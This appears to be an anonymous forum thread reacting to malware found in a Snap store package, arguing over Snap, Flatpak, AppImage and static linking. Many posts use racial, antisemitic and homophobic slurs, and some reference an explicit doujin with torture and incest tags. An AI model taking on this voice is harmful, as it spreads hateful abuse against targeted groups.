I've always been suspicious of Snaps and Flatpaks. Sounds like something right out of some shitty hipster startup from siliconeSJW valley. If your program requires some third party package distribution system then you might want to rethink your build system and dependency management. From wiki: The idea of using application containers in GNOME was first proposed in 2013 by Lennart Poettering. I knew it! Another great idea from our lord and savior Lennart.
I vaguely remember Icculus pushing this back in the day. I forget exactly why it got rejected. FatElf was basically the Windows way of doing things shoehorned into Unix/Linux. Then again, this IS the guy to invented Mojo installers.
Kinda late though. This has already blown up on the Linux Leddit.
Anthony Allen
how about statically compiling all the libraries into the binary? is this not distro-agnostic? will this not run on the majority of distro's with no dependency requirements?
i realize it's a pain in the ass to compile and results an an extremely bloated executable but who cares if some fuck is too lazy to install dependencies then he gets this.
Noah Watson
glibc's static linking fucking sucks
Juan Allen
There is a good reason FatElf was rejected by Linus, whereas AppImage and Flatpak get his support.
Flatpak and AppImage have made life sticking to LTS releases MUCH easier. But yeah, we are going to have to hold Canonical and the Flathub guys to account when shit like this happens.
well i mean, it was indistinguishable from malware in the first place but okay
Jackson Long
i'm not talking about fatelf. i'm not talking about multiple architectures, arm, x86, etc, in the same binary, just regular static compiled x86 binaries.
what are the problems? i've only done it a couple of times and given I didn't test the result on 10 different distributions but i've never had problems.
Ryder Long
great, here's the solution. we need the equivalent of pozjew and chromium's forced add-on signing even for shit that isn't in the appstore, now on your desktop.
we need a bunch of kikes to sit and moderate software that is specifically not in the moderated package repositories. surely this will go well. this nigger did this on purpose to bring down censorship on flatpack and snaps or whatever the fuck else.
That isn't really technically possible though. I mean, you could make users jump through an extra hoop I suppose.
Jackson Ross
I mean, depending on how old your distro is, compiling a new version of foo might not be an option. That said, I imagine this is how most casual Linux users see things.
Easton Morgan
i would say i'm too used to gentoo, but it's not difficult on debian/jewbuntu either. apt-get build-dep poosoftapt-get source poosofttar -xzf poosoftcd poosoft./configuremake -j1checkinstall poosoft
Cameron Parker
Not everything is that trivial to compile though.
Brayden Collins
Flathub hasn't had anything like this happen though. From here on, I'd say AppImage is a more likely Trojan horse for this kind of mining malware.
it wouldn't surprise me if canonical patched the kernel to include a kosher signing check before every executable runs.
Luis Kelly
That wouldn't have stopped this though. THEY are the ones who allowed it in their repo in the first place.
Dominic Cruz
This is what you get for using proprietary software.
Charles Diaz
The binary blob was snuck into the package. 2048 itself is free software.
Brandon Morgan
This was inevitable, Canonical and the "Year of the Linux Desktop" faggots want Windows but the street cred of Linux, so they will turn GNU/Linux into Windows with all the malware. Android/Linux has the same problem even though Google has full control there, you just can't make sure that a proprietary blob is not malicious. But the business models of the platform owners rests on the masses executing arbitrary code from third parties so they will just sacrifice some suckers and pull the malware when there is an outcry.
Not the snap version, thanks to submissive license.
Snap is actually geared more to IOT than the Desktop. One of the main reasons they think it's better than Flatpak is because Flatpak actually is centered around desktop use cases.
Colton Mitchell
I wonder if they can find out exactly who this is.
Evan Gutierrez
cuck licenses btfo again
Gabriel Flores
Common sense should avoid most of this shit though. Don't download the Krita AppImage from anyplace besides the Krita official or anywhere else they endorse.
and of course upgrading to a new version of shitlib breaks five dozen other applications. Granted, you could compile the new shitlib and statically link against that, but you'll have to compile seven more dependencies for it, one of them requiring very exotic compiler flags to not crash every other minute.
Mason Harris
You can have multiple versions of the same library installed at the same time.
Cameron Rodriguez
What is wrong with compiling yourself only as the last resort? Not every software is as trivial as ./configure && make && make install
Ian Hall
The problem here is that no one audtis the packages submitted to the Snap store, not Snap itself.
You can be sure that this has happened with PPA and AUR but nobody ever realized.
Jose Ross
>obvious leddit copy-paste thread without archive links >ByteCoin (BCN) has a nigger and a sandnigger in its developer team, and the overall community manager is likely a kike >BCN is accused of being a (((scamcoin))) multiple times
Austin Stewart
...
Adrian Barnes
Never was this logical. Any package can contain a virus. Or even a python script you've downloaded from somewhere.
Aaron Baker
Nevermind how much longer it can take for larger applications like the GIMP or Kdenlive.
Jace Perry
*Malware. Viruses replicate themselves into other systems. And ANY operating system can have malware made for it.
Juan Jones
Who told you that? It just has less relevant vulnerabilities and is less affected by malware.
Just when I was about to try out Kubuntu. Did it come preinstalled?
Ayden Bennett
Snap comes preinstalled. These packages didn't. This is only slightly more remarkable than "malware found on Google Play".
Nicholas Peterson
gg freetards. If you pay for software, you don't get malware. Remember, if you're not the customer, you're the product.
Cooper Hall
also remember to not use paid software which is proprietary. They can double dip with you being both the customer AND the product (without you even knowing it).
Nolan Turner
And here's why you're retarded Learn to read dumbfuck
Owen Reyes
Keep posting these sexy women
Carson Carter
Most proprietary software is malware. Doesn't matter if you pay for it or not.
Do what I asked you to do pls Also please include source
Kayden Brown
You don't have to link against glibc. Link against musl or any non-bloated libc and it will still run in a glibc environment. The only thing a statically linked binary depends on is kernel interfaces being present, and we all know how autistic linus is about backwards compatibility (it why linux is such a bloated piece of shit).
Ulrich drepper actively tries to make statically linking with glibc terrible. I can't find the articles right now though. In general however the meme about static linking producing huge binaries comes entirely from people linking against glibc. The smallest possible program( int main() {} ) statically linked with glibc is >600K.
Evan Gonzalez
Stop. You are hurting me.
Wyatt Reyes
I said please
Henry Thomas
It's ShindoL, some of the tags from that doujin are: mind break, torture, moral degradation, moral degeneration, snuff, guru, blackmail, drugs, and incest. If that still interests you then have fun user.
Ethan Parker
You can always tell a newfag from the way they sperg about Libbie and Kiki. Most useful.
